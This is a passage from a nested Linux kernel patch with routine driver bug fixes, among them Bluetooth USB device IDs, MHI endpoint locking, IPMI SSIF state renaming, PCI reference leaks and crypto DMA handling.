++	if (ub->nr_privileged_daemon != ub->nr_queues_ready)
++		set_bit(GD_SUPPRESS_PART_SCAN, &disk->state);
++
+ 	get_device(&ub->cdev_dev);
+ 	ret = add_disk(disk);
+ 	if (ret) {
+@@ -1936,6 +1948,7 @@ static int ublk_ctrl_start_recovery(struct io_uring_cmd *cmd)
+ 	/* set to NULL, otherwise new ubq_daemon cannot mmap the io_cmd_buf */
+ 	ub->mm = NULL;
+ 	ub->nr_queues_ready = 0;
++	ub->nr_privileged_daemon = 0;
+ 	init_completion(&ub->completion);
+ 	ret = 0;
+  out_unlock:
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 93e9ae928e4e8..952dc9d2404ed 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -63,6 +63,7 @@ static struct usb_driver btusb_driver;
+ #define BTUSB_INTEL_BROKEN_SHUTDOWN_LED	BIT(24)
+ #define BTUSB_INTEL_BROKEN_INITIAL_NCMD BIT(25)
+ #define BTUSB_INTEL_NO_WBS_SUPPORT	BIT(26)
++#define BTUSB_ACTIONS_SEMI		BIT(27)
+ 
+ static const struct usb_device_id btusb_table[] = {
+ 	/* Generic Bluetooth USB device */
+@@ -491,6 +492,10 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_VENDOR_AND_INTERFACE_INFO(0x8087, 0xe0, 0x01, 0x01),
+ 	  .driver_info = BTUSB_IGNORE },
+ 
++	/* Realtek 8821CE Bluetooth devices */
++	{ USB_DEVICE(0x13d3, 0x3529), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++
+ 	/* Realtek 8822CE Bluetooth devices */
+ 	{ USB_DEVICE(0x0bda, 0xb00c), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
+@@ -557,6 +562,9 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x0489, 0xe0e0), .driver_info = BTUSB_MEDIATEK |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0f2), .driver_info = BTUSB_MEDIATEK |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
+ 	{ USB_DEVICE(0x04ca, 0x3802), .driver_info = BTUSB_MEDIATEK |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
+@@ -663,6 +671,9 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x0cb5, 0xc547), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
+ 
++	/* Actions Semiconductor ATS2851 based devices */
++	{ USB_DEVICE(0x10d7, 0xb012), .driver_info = BTUSB_ACTIONS_SEMI },
++
+ 	/* Silicon Wave based devices */
+ 	{ USB_DEVICE(0x0c10, 0x0000), .driver_info = BTUSB_SWAVE },
+ 
+@@ -4012,6 +4023,11 @@ static int btusb_probe(struct usb_interface *intf,
+ 		set_bit(BTUSB_USE_ALT3_FOR_WBS, &data->flags);
+ 	}
+ 
++	if (id->driver_info & BTUSB_ACTIONS_SEMI) {
++		/* Support is advertised, but not implemented */
++		set_bit(HCI_QUIRK_BROKEN_ERR_DATA_REPORTING, &hdev->quirks);
++	}
++
+ 	if (!reset)
+ 		set_bit(HCI_QUIRK_RESET_ON_CLOSE, &hdev->quirks);
+ 
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index e4398590b0edc..7b9fd5f104335 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -1582,10 +1582,11 @@ static bool qca_wakeup(struct hci_dev *hdev)
+ 	struct hci_uart *hu = hci_get_drvdata(hdev);
+ 	bool wakeup;
+ 
+-	/* UART driver handles the interrupt from BT SoC.So we need to use
+-	 * device handle of UART driver to get the status of device may wakeup.
++	/* BT SoC attached through the serial bus is handled by the serdev driver.
++	 * So we need to use the device handle of the serdev driver to get the
++	 * status of device may wakeup.
+ 	 */
+-	wakeup = device_may_wakeup(hu->serdev->ctrl->dev.parent);
++	wakeup = device_may_wakeup(&hu->serdev->ctrl->dev);
+ 	bt_dev_dbg(hu->hdev, "wakeup status : %d", wakeup);
+ 
+ 	return wakeup;
+diff --git a/drivers/bus/mhi/ep/main.c b/drivers/bus/mhi/ep/main.c
+index 1dc8a3557a464..9c42886818418 100644
+--- a/drivers/bus/mhi/ep/main.c
++++ b/drivers/bus/mhi/ep/main.c
+@@ -196,9 +196,11 @@ static int mhi_ep_process_cmd_ring(struct mhi_ep_ring *ring, struct mhi_ring_ele
+ 		mhi_ep_mmio_disable_chdb(mhi_cntrl, ch_id);
+ 
+ 		/* Send channel disconnect status to client drivers */
+-		result.transaction_status = -ENOTCONN;
+-		result.bytes_xferd = 0;
+-		mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		if (mhi_chan->xfer_cb) {
++			result.transaction_status = -ENOTCONN;
++			result.bytes_xferd = 0;
++			mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		}
+ 
+ 		/* Set channel state to STOP */
+ 		mhi_chan->state = MHI_CH_STATE_STOP;
+@@ -228,9 +230,11 @@ static int mhi_ep_process_cmd_ring(struct mhi_ep_ring *ring, struct mhi_ring_ele
+ 		mhi_ep_ring_reset(mhi_cntrl, ch_ring);
+ 
+ 		/* Send channel disconnect status to client driver */
+-		result.transaction_status = -ENOTCONN;
+-		result.bytes_xferd = 0;
+-		mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		if (mhi_chan->xfer_cb) {
++			result.transaction_status = -ENOTCONN;
++			result.bytes_xferd = 0;
++			mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		}
+ 
+ 		/* Set channel state to DISABLED */
+ 		mhi_chan->state = MHI_CH_STATE_DISABLED;
+@@ -719,24 +723,37 @@ static void mhi_ep_ch_ring_worker(struct work_struct *work)
+ 		list_del(&itr->node);
+ 		ring = itr->ring;
+ 
++		chan = &mhi_cntrl->mhi_chan[ring->ch_id];
++		mutex_lock(&chan->lock);
++
++		/*
++		 * The ring could've stopped while we waited to grab the (chan->lock), so do
++		 * a sanity check before going further.
++		 */
++		if (!ring->started) {
++			mutex_unlock(&chan->lock);
++			kfree(itr);
++			continue;
++		}
++
+ 		/* Update the write offset for the ring */
+ 		ret = mhi_ep_update_wr_offset(ring);
+ 		if (ret) {
+ 			dev_err(dev, "Error updating write offset for ring\n");
++			mutex_unlock(&chan->lock);
+ 			kfree(itr);
+ 			continue;
+ 		}
+ 
+ 		/* Sanity check to make sure there are elements in the ring */
+ 		if (ring->rd_offset == ring->wr_offset) {
++			mutex_unlock(&chan->lock);
+ 			kfree(itr);
+ 			continue;
+ 		}
+ 
+ 		el = &ring->ring_cache[ring->rd_offset];
+-		chan = &mhi_cntrl->mhi_chan[ring->ch_id];
+ 
+-		mutex_lock(&chan->lock);
+ 		dev_dbg(dev, "Processing the ring for channel (%u)\n", ring->ch_id);
+ 		ret = mhi_ep_process_ch_ring(ring, el);
+ 		if (ret) {
+@@ -1119,6 +1136,7 @@ void mhi_ep_suspend_channels(struct mhi_ep_cntrl *mhi_cntrl)
+ 
+ 		dev_dbg(&mhi_chan->mhi_dev->dev, "Suspending channel\n");
+ 		/* Set channel state to SUSPENDED */
++		mhi_chan->state = MHI_CH_STATE_SUSPENDED;
+ 		tmp &= ~CHAN_CTX_CHSTATE_MASK;
+ 		tmp |= FIELD_PREP(CHAN_CTX_CHSTATE_MASK, MHI_CH_STATE_SUSPENDED);
+ 		mhi_cntrl->ch_ctx_cache[i].chcfg = cpu_to_le32(tmp);
+@@ -1148,6 +1166,7 @@ void mhi_ep_resume_channels(struct mhi_ep_cntrl *mhi_cntrl)
+ 
+ 		dev_dbg(&mhi_chan->mhi_dev->dev, "Resuming channel\n");
+ 		/* Set channel state to RUNNING */
++		mhi_chan->state = MHI_CH_STATE_RUNNING;
+ 		tmp &= ~CHAN_CTX_CHSTATE_MASK;
+ 		tmp |= FIELD_PREP(CHAN_CTX_CHSTATE_MASK, MHI_CH_STATE_RUNNING);
+ 		mhi_cntrl->ch_ctx_cache[i].chcfg = cpu_to_le32(tmp);
+diff --git a/drivers/char/applicom.c b/drivers/char/applicom.c
+index 36203d3fa6ea6..69314532f38cd 100644
+--- a/drivers/char/applicom.c
++++ b/drivers/char/applicom.c
+@@ -197,8 +197,10 @@ static int __init applicom_init(void)
+ 		if (!pci_match_id(applicom_pci_tbl, dev))
+ 			continue;
+ 		
+-		if (pci_enable_device(dev))
++		if (pci_enable_device(dev)) {
++			pci_dev_put(dev);
+ 			return -EIO;
++		}
+ 
+ 		RamIO = ioremap(pci_resource_start(dev, 0), LEN_RAM_IO);
+ 
+@@ -207,6 +209,7 @@ static int __init applicom_init(void)
+ 				"space at 0x%llx\n",
+ 				(unsigned long long)pci_resource_start(dev, 0));
+ 			pci_disable_device(dev);
++			pci_dev_put(dev);
+ 			return -EIO;
+ 		}
+ 
+diff --git a/drivers/char/ipmi/ipmi_ipmb.c b/drivers/char/ipmi/ipmi_ipmb.c
+index 7c1aee5e11b77..3f1c9f1573e78 100644
+--- a/drivers/char/ipmi/ipmi_ipmb.c
++++ b/drivers/char/ipmi/ipmi_ipmb.c
+@@ -27,7 +27,7 @@ MODULE_PARM_DESC(bmcaddr, "Address to use for BMC.");
+ 
+ static unsigned int retry_time_ms = 250;
+ module_param(retry_time_ms, uint, 0644);
+-MODULE_PARM_DESC(max_retries, "Timeout time between retries, in milliseconds.");
++MODULE_PARM_DESC(retry_time_ms, "Timeout time between retries, in milliseconds.");
+ 
+ static unsigned int max_retries = 1;
+ module_param(max_retries, uint, 0644);
+diff --git a/drivers/char/ipmi/ipmi_ssif.c b/drivers/char/ipmi/ipmi_ssif.c
+index e1072809fe318..7c606c49cd535 100644
+--- a/drivers/char/ipmi/ipmi_ssif.c
++++ b/drivers/char/ipmi/ipmi_ssif.c
+@@ -92,7 +92,7 @@
+ #define SSIF_WATCH_WATCHDOG_TIMEOUT	msecs_to_jiffies(250)
+ 
+ enum ssif_intf_state {
+-	SSIF_NORMAL,
++	SSIF_IDLE,
+ 	SSIF_GETTING_FLAGS,
+ 	SSIF_GETTING_EVENTS,
+ 	SSIF_CLEARING_FLAGS,
+@@ -100,8 +100,8 @@ enum ssif_intf_state {
+ 	/* FIXME - add watchdog stuff. */
+ };
+ 
+-#define SSIF_IDLE(ssif)	 ((ssif)->ssif_state == SSIF_NORMAL \
+-			  && (ssif)->curr_msg == NULL)
++#define IS_SSIF_IDLE(ssif) ((ssif)->ssif_state == SSIF_IDLE \
++			    && (ssif)->curr_msg == NULL)
+ 
+ /*
+  * Indexes into stats[] in ssif_info below.
+@@ -348,9 +348,9 @@ static void return_hosed_msg(struct ssif_info *ssif_info,
+ 
+ /*
+  * Must be called with the message lock held.  This will release the
+- * message lock.  Note that the caller will check SSIF_IDLE and start a
+- * new operation, so there is no need to check for new messages to
+- * start in here.
++ * message lock.  Note that the caller will check IS_SSIF_IDLE and
++ * start a new operation, so there is no need to check for new
++ * messages to start in here.
+  */
+ static void start_clear_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ {
+@@ -367,7 +367,7 @@ static void start_clear_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ 
+ 	if (start_send(ssif_info, msg, 3) != 0) {
+ 		/* Error, just go to normal state. */
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 	}
+ }
+ 
+@@ -382,7 +382,7 @@ static void start_flag_fetch(struct ssif_info *ssif_info, unsigned long *flags)
+ 	mb[0] = (IPMI_NETFN_APP_REQUEST << 2);
+ 	mb[1] = IPMI_GET_MSG_FLAGS_CMD;
+ 	if (start_send(ssif_info, mb, 2) != 0)
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ }
+ 
+ static void check_start_send(struct ssif_info *ssif_info, unsigned long *flags,
+@@ -393,7 +393,7 @@ static void check_start_send(struct ssif_info *ssif_info, unsigned long *flags,
+ 
+ 		flags = ipmi_ssif_lock_cond(ssif_info, &oflags);
+ 		ssif_info->curr_msg = NULL;
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		ipmi_free_smi_msg(msg);
+ 	}
+@@ -407,7 +407,7 @@ static void start_event_fetch(struct ssif_info *ssif_info, unsigned long *flags)
+ 
+ 	msg = ipmi_alloc_smi_msg();
+ 	if (!msg) {
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		return;
+ 	}
+@@ -430,7 +430,7 @@ static void start_recv_msg_fetch(struct ssif_info *ssif_info,
+ 
+ 	msg = ipmi_alloc_smi_msg();
+ 	if (!msg) {
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		return;
+ 	}
+@@ -448,9 +448,9 @@ static void start_recv_msg_fetch(struct ssif_info *ssif_info,
+ 
+ /*
+  * Must be called with the message lock held.  This will release the
+- * message lock.  Note that the caller will check SSIF_IDLE and start a
+- * new operation, so there is no need to check for new messages to
+- * start in here.
++ * message lock.  Note that the caller will check IS_SSIF_IDLE and
++ * start a new operation, so there is no need to check for new
++ * messages to start in here.
+  */
+ static void handle_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ {
+@@ -466,7 +466,7 @@ static void handle_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ 		/* Events available. */
+ 		start_event_fetch(ssif_info, flags);
+ 	else {
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 	}
+ }
+@@ -568,7 +568,7 @@ static void watch_timeout(struct timer_list *t)
+ 	if (ssif_info->watch_timeout) {
+ 		mod_timer(&ssif_info->watch_timer,
+ 			  jiffies + ssif_info->watch_timeout);
+-		if (SSIF_IDLE(ssif_info)) {
++		if (IS_SSIF_IDLE(ssif_info)) {
+ 			start_flag_fetch(ssif_info, flags); /* Releases lock */
+ 			return;
+ 		}
+@@ -602,7 +602,7 @@ static void ssif_alert(struct i2c_client *client, enum i2c_alert_protocol type,
+ 		start_get(ssif_info);
+ }
+ 
+-static int start_resend(struct ssif_info *ssif_info);
++static void start_resend(struct ssif_info *ssif_info);
+ 
+ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 			     unsigned char *data, unsigned int len)
+@@ -756,7 +756,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 	}
+ 
+ 	switch (ssif_info->ssif_state) {
+-	case SSIF_NORMAL:
++	case SSIF_IDLE:
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		if (!msg)
+ 			break;
+@@ -774,7 +774,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 			 * Error fetching flags, or invalid length,
+ 			 * just give up for now.
+ 			 */
+-			ssif_info->ssif_state = SSIF_NORMAL;
++			ssif_info->ssif_state = SSIF_IDLE;
+ 			ipmi_ssif_unlock_cond(ssif_info, flags);
+ 			dev_warn(&ssif_info->client->dev,
+ 				 "Error getting flags: %d %d, %x\n",
+@@ -809,7 +809,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 				 "Invalid response clearing flags: %x %x\n",
+ 				 data[0], data[1]);
+ 		}
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		break;
+ 
+@@ -887,7 +887,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 	}
+ 
+ 	flags = ipmi_ssif_lock_cond(ssif_info, &oflags);
+-	if (SSIF_IDLE(ssif_info) && !ssif_info->stopping) {
++	if (IS_SSIF_IDLE(ssif_info) && !ssif_info->stopping) {
+ 		if (ssif_info->req_events)
+ 			start_event_fetch(ssif_info, flags);
+ 		else if (ssif_info->req_flags)
+@@ -909,31 +909,17 @@ static void msg_written_handler(struct ssif_info *ssif_info, int result,
+ 	if (result < 0) {
+ 		ssif_info->retries_left--;
+ 		if (ssif_info->retries_left > 0) {
+-			if (!start_resend(ssif_info)) {
+-				ssif_inc_stat(ssif_info, send_retries);
+-				return;
+-			}
+-			/* request failed, just return the error. */
+-			ssif_inc_stat(ssif_info, send_errors);
+-
+-			if (ssif_info->ssif_debug & SSIF_DEBUG_MSG)
+-				dev_dbg(&ssif_info->client->dev,
+-					"%s: Out of retries\n", __func__);
+-			msg_done_handler(ssif_info, -EIO, NULL, 0);
++			start_resend(ssif_info);
+ 			return;
+ 		}
+ 
+ 		ssif_inc_stat(ssif_info, send_errors);
+ 
+-		/*
+-		 * Got an error on transmit, let the done routine
+-		 * handle it.
+-		 */
+ 		if (ssif_info->ssif_debug & SSIF_DEBUG_MSG)
+ 			dev_dbg(&ssif_info->client->dev,
+-				"%s: Error  %d\n", __func__, result);
++				"%s: Out of retries\n", __func__);
+ 
+-		msg_done_handler(ssif_info, result, NULL, 0);
++		msg_done_handler(ssif_info, -EIO, NULL, 0);
+ 		return;
+ 	}
+ 
+@@ -996,7 +982,7 @@ static void msg_written_handler(struct ssif_info *ssif_info, int result,
+ 	}
+ }
+ 
+-static int start_resend(struct ssif_info *ssif_info)
++static void start_resend(struct ssif_info *ssif_info)
+ {
+ 	int command;
+ 
+@@ -1021,7 +1007,6 @@ static int start_resend(struct ssif_info *ssif_info)
+ 
+ 	ssif_i2c_send(ssif_info, msg_written_handler, I2C_SMBUS_WRITE,
+ 		   command, ssif_info->data, I2C_SMBUS_BLOCK_DATA);
+-	return 0;
+ }
+ 
+ static int start_send(struct ssif_info *ssif_info,
+@@ -1036,7 +1021,8 @@ static int start_send(struct ssif_info *ssif_info,
+ 	ssif_info->retries_left = SSIF_SEND_RETRIES;
+ 	memcpy(ssif_info->data + 1, data, len);
+ 	ssif_info->data_len = len;
+-	return start_resend(ssif_info);
++	start_resend(ssif_info);
++	return 0;
+ }
+ 
+ /* Must be called with the message lock held. */
+@@ -1046,7 +1032,7 @@ static void start_next_msg(struct ssif_info *ssif_info, unsigned long *flags)
+ 	unsigned long oflags;
+ 
+  restart:
+-	if (!SSIF_IDLE(ssif_info)) {
++	if (!IS_SSIF_IDLE(ssif_info)) {
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		return;
+ 	}
+@@ -1269,7 +1255,7 @@ static void shutdown_ssif(void *send_info)
+ 	dev_set_drvdata(&ssif_info->client->dev, NULL);
+ 
+ 	/* make sure the driver is not looking for flags any more. */
+-	while (ssif_info->ssif_state != SSIF_NORMAL)
++	while (ssif_info->ssif_state != SSIF_IDLE)
+ 		schedule_timeout(1);
+ 
+ 	ssif_info->stopping = true;
+@@ -1839,7 +1825,7 @@ static int ssif_probe(struct i2c_client *client)
+ 	}
+ 
+ 	spin_lock_init(&ssif_info->lock);
+-	ssif_info->ssif_state = SSIF_NORMAL;
++	ssif_info->ssif_state = SSIF_IDLE;
+ 	timer_setup(&ssif_info->retry_timer, retry_timeout, 0);
+ 	timer_setup(&ssif_info->watch_timer, watch_timeout, 0);
+ 
+diff --git a/drivers/char/pcmcia/cm4000_cs.c b/drivers/char/pcmcia/cm4000_cs.c
+index adaec8fd4b16c..e656f42a28ac2 100644
+--- a/drivers/char/pcmcia/cm4000_cs.c
++++ b/drivers/char/pcmcia/cm4000_cs.c
+@@ -529,7 +529,8 @@ static int set_protocol(struct cm4000_dev *dev, struct ptsreq *ptsreq)
+ 			DEBUGP(5, dev, "NumRecBytes is valid\n");
+ 			break;
+ 		}
+-		usleep_range(10000, 11000);
++		/* can not sleep as this is in atomic context */
++		mdelay(10);
+ 	}
+ 	if (i == 100) {
+ 		DEBUGP(5, dev, "Timeout waiting for NumRecBytes getting "
+@@ -549,7 +550,8 @@ static int set_protocol(struct cm4000_dev *dev, struct ptsreq *ptsreq)
+ 			}
+ 			break;
+ 		}
+-		usleep_range(10000, 11000);
++		/* can not sleep as this is in atomic context */
++		mdelay(10);
+ 	}
+ 
+ 	/* check whether it is a short PTS reply? */
+diff --git a/drivers/clocksource/timer-riscv.c b/drivers/clocksource/timer-riscv.c
+index a0d66fabf0732..a01c2bd241349 100644
+--- a/drivers/clocksource/timer-riscv.c
++++ b/drivers/clocksource/timer-riscv.c
+@@ -177,6 +177,11 @@ static int __init riscv_timer_init_dt(struct device_node *n)
+ 		return error;
+ 	}
+ 
++	if (riscv_isa_extension_available(NULL, SSTC)) {
++		pr_info("Timer interrupt in S-mode is available via sstc extension\n");
++		static_branch_enable(&riscv_sstc_available);
++	}
++
+ 	error = cpuhp_setup_state(CPUHP_AP_RISCV_TIMER_STARTING,
+ 			 "clockevents/riscv/timer:starting",
+ 			 riscv_timer_starting_cpu, riscv_timer_dying_cpu);
+@@ -184,11 +189,6 @@ static int __init riscv_timer_init_dt(struct device_node *n)
+ 		pr_err("cpu hp setup state failed for RISCV timer [%d]\n",
+ 		       error);
+ 
+-	if (riscv_isa_extension_available(NULL, SSTC)) {
+-		pr_info("Timer interrupt in S-mode is available via sstc extension\n");
+-		static_branch_enable(&riscv_sstc_available);
+-	}
+-
+ 	return error;
+ }
+ 
+diff --git a/drivers/cpufreq/davinci-cpufreq.c b/drivers/cpufreq/davinci-cpufreq.c
+index 9e97f60f81996..ebb3a81026816 100644
+--- a/drivers/cpufreq/davinci-cpufreq.c
++++ b/drivers/cpufreq/davinci-cpufreq.c
+@@ -133,12 +133,14 @@ static int __init davinci_cpufreq_probe(struct platform_device *pdev)
+ 
+ static int __exit davinci_cpufreq_remove(struct platform_device *pdev)
+ {
++	cpufreq_unregister_driver(&davinci_driver);
++
+ 	clk_put(cpufreq.armclk);
+ 
+ 	if (cpufreq.asyncclk)
+ 		clk_put(cpufreq.asyncclk);
+ 
+-	return cpufreq_unregister_driver(&davinci_driver);
++	return 0;
+ }
+ 
+ static struct platform_driver davinci_cpufreq_driver = {
+diff --git a/drivers/cpuidle/Kconfig.arm b/drivers/cpuidle/Kconfig.arm
+index 747aa537389b9..f0714a32921e6 100644
+--- a/drivers/cpuidle/Kconfig.arm
++++ b/drivers/cpuidle/Kconfig.arm
+@@ -102,6 +102,7 @@ config ARM_MVEBU_V7_CPUIDLE
+ config ARM_TEGRA_CPUIDLE
+ 	bool "CPU Idle Driver for NVIDIA Tegra SoCs"
+ 	depends on (ARCH_TEGRA || COMPILE_TEST) && !ARM64 && MMU
++	depends on ARCH_SUSPEND_POSSIBLE
+ 	select ARCH_NEEDS_CPU_IDLE_COUPLED if SMP
+ 	select ARM_CPU_SUSPEND
+ 	help
+@@ -110,6 +111,7 @@ config ARM_TEGRA_CPUIDLE
+ config ARM_QCOM_SPM_CPUIDLE
+ 	bool "CPU Idle Driver for Qualcomm Subsystem Power Manager (SPM)"
+ 	depends on (ARCH_QCOM || COMPILE_TEST) && !ARM64 && MMU
++	depends on ARCH_SUSPEND_POSSIBLE
+ 	select ARM_CPU_SUSPEND
+ 	select CPU_IDLE_MULTIPLE_DRIVERS
+ 	select DT_IDLE_STATES
+diff --git a/drivers/crypto/amcc/crypto4xx_core.c b/drivers/crypto/amcc/crypto4xx_core.c
+index 280f4b0e71334..50dc783821b69 100644
+--- a/drivers/crypto/amcc/crypto4xx_core.c
++++ b/drivers/crypto/amcc/crypto4xx_core.c
+@@ -522,7 +522,6 @@ static void crypto4xx_cipher_done(struct crypto4xx_device *dev,
+ {
+ 	struct skcipher_request *req;
+ 	struct scatterlist *dst;
+-	dma_addr_t addr;
+ 
+ 	req = skcipher_request_cast(pd_uinfo->async_req);
+ 
+@@ -531,8 +530,8 @@ static void crypto4xx_cipher_done(struct crypto4xx_device *dev,
+ 					  req->cryptlen, req->dst);
+ 	} else {
+ 		dst = pd_uinfo->dest_va;
+-		addr = dma_map_page(dev->core_dev->device, sg_page(dst),
+-				    dst->offset, dst->length, DMA_FROM_DEVICE);
++		dma_unmap_page(dev->core_dev->device, pd->dest, dst->length,
++			       DMA_FROM_DEVICE);
+ 	}
+ 
+ 	if (pd_uinfo->sa_va->sa_command_0.bf.save_iv == SA_SAVE_IV) {
+@@ -557,10 +556,9 @@ static void crypto4xx_ahash_done(struct crypto4xx_device *dev,
+ 	struct ahash_request *ahash_req;
+ 
+ 	ahash_req = ahash_request_cast(pd_uinfo->async_req);
+-	ctx  = crypto_tfm_ctx(ahash_req->base.tfm);
++	ctx = crypto_ahash_ctx(crypto_ahash_reqtfm(ahash_req));
+ 
+-	crypto4xx_copy_digest_to_dst(ahash_req->result, pd_uinfo,
+-				     crypto_tfm_ctx(ahash_req->base.tfm));
++	crypto4xx_copy_digest_to_dst(ahash_req->result, pd_uinfo, ctx);
+ 	crypto4xx_ret_sg_desc(dev, pd_uinfo);
+ 
+ 	if (pd_uinfo->state & PD_ENTRY_BUSY)
+diff --git a/drivers/crypto/ccp/ccp-dmaengine.c b/drivers/crypto/ccp/ccp-dmaengine.c
+index 9f753cb4f5f18..b386a7063818b 100644
+--- a/drivers/crypto/ccp/ccp-dmaengine.c
++++ b/drivers/crypto/ccp/ccp-dmaengine.c
+@@ -642,14 +642,26 @@ static void ccp_dma_release(struct ccp_device *ccp)
+ 		chan = ccp->ccp_dma_chan + i;
+ 		dma_chan = &chan->dma_chan;
+ 
+-		if (dma_chan->client_count)
+-			dma_release_channel(dma_chan);
+-
+ 		tasklet_kill(&chan->cleanup_tasklet);
+ 		list_del_rcu(&dma_chan->device_node);
+ 	}
+ }
+ 
++static void ccp_dma_release_channels(struct ccp_device *ccp)
++{
++	struct ccp_dma_chan *chan;
++	struct dma_chan *dma_chan;
++	unsigned int i;
++
++	for (i = 0; i < ccp->cmd_q_count; i++) {
++		chan = ccp->ccp_dma_chan + i;
++		dma_chan = &chan->dma_chan;
++
++		if (dma_chan->client_count)
++			dma_release_channel(dma_chan);
++	}
++}
++
+ int ccp_dmaengine_register(struct ccp_device *ccp)
+ {
+ 	struct ccp_dma_chan *chan;
+@@ -770,8 +782,9 @@ void ccp_dmaengine_unregister(struct ccp_device *ccp)
+ 	if (!dmaengine)
+ 		return;
+ 
+-	ccp_dma_release(ccp);
++	ccp_dma_release_channels(ccp);
+ 	dma_async_device_unregister(dma_dev);
++	ccp_dma_release(ccp);
+ 
+ 	kmem_cache_destroy(ccp->dma_desc_cache);
+ 	kmem_cache_destroy(ccp->dma_cmd_cache);
+diff --git a/drivers/crypto/ccp/sev-dev.c b/drivers/crypto/ccp/sev-dev.c
+index 06fc7156c04f3..3e583f0324874 100644
+--- a/drivers/crypto/ccp/sev-dev.c
++++ b/drivers/crypto/ccp/sev-dev.c
+@@ -26,6 +26,7 @@
+ #include <linux/fs_struct.h>
+ 
+ #include <asm/smp.h>
++#include <asm/cacheflush.h>
+ 
+ #include "psp-dev.h"
+ #include "sev-dev.h"
+@@ -881,7 +882,14 @@ static int sev_ioctl_do_get_id2(struct sev_issue_cmd *argp)
+ 	input_address = (void __user *)input.address;
+ 
+ 	if (input.address && input.length) {
+-		id_blob = kzalloc(input.length, GFP_KERNEL);
++		/*
++		 * The length of the ID shouldn't be assumed by software since
++		 * it may change in the future.  The allocation size is limited
++		 * to 1 << (PAGE_SHIFT + MAX_ORDER - 1) by the page allocator.
++		 * If the allocation fails, simply return ENOMEM rather than
++		 * warning in the kernel log.
++		 */
++		id_blob = kzalloc(input.length, GFP_KERNEL | __GFP_NOWARN);
+ 		if (!id_blob)
+ 			return -ENOMEM;
+ 
+@@ -1327,7 +1335,10 @@ void sev_pci_init(void)
+ 
+ 	/* Obtain the TMR memory area for SEV-ES use */
+ 	sev_es_tmr = sev_fw_alloc(SEV_ES_TMR_SIZE);
+-	if (!sev_es_tmr)
++	if (sev_es_tmr)
++		/* Must flush the cache before giving it to the firmware */
++		clflush_cache_range(sev_es_tmr, SEV_ES_TMR_SIZE);
++	else
+ 		dev_warn(sev->dev,
+ 			 "SEV: TMR allocation failed, SEV-ES support unavailable\n");
+ 
+diff --git a/drivers/crypto/hisilicon/sgl.c b/drivers/crypto/hisilicon/sgl.c
+index 2b6f2281cfd6c..0974b00414050 100644
+--- a/drivers/crypto/hisilicon/sgl.c
++++ b/drivers/crypto/hisilicon/sgl.c
+@@ -124,9 +124,8 @@ err_free_mem:
+ 	for (j = 0; j < i; j++) {
+ 		dma_free_coherent(dev, block_size, block[j].sgl,
+ 				  block[j].sgl_dma);
+-		memset(block + j, 0, sizeof(*block));
+ 	}
+-	kfree(pool);
++	kfree_sensitive(pool);
+ 	return ERR_PTR(-ENOMEM);
+ }
+ EXPORT_SYMBOL_GPL(hisi_acc_create_sgl_pool);
+diff --git a/drivers/crypto/marvell/octeontx2/Makefile b/drivers/crypto/marvell/octeontx2/Makefile
+index 965297e969546..f0f2942c1d278 100644
+--- a/drivers/crypto/marvell/octeontx2/Makefile
++++ b/drivers/crypto/marvell/octeontx2/Makefile
+@@ -1,11 +1,10 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-obj-$(CONFIG_CRYPTO_DEV_OCTEONTX2_CPT) += rvu_cptpf.o rvu_cptvf.o
++obj-$(CONFIG_CRYPTO_DEV_OCTEONTX2_CPT) += rvu_cptcommon.o rvu_cptpf.o rvu_cptvf.o
+ 
++rvu_cptcommon-objs := cn10k_cpt.o otx2_cptlf.o otx2_cpt_mbox_common.o
